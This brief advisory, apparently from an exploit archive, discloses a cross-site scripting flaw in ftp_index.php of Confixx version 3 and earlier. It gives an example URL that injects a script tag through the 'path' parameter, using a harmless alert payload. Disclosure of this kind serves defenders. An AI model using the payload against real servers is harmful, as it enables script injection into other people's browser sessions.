Confixx versions 3 and below suffer from a cross site scripting flaw in ftp_index.php.
d761210d3ba620cb06194efcb4b722e28482a023b82b438e9ee8625607e7c97b
p0w3r ~ curse-crew.de
Examples: [confixx]/ftplogin/[username]/ftp_index.php?path=<script>alert('p0w3r oWnZ')</script>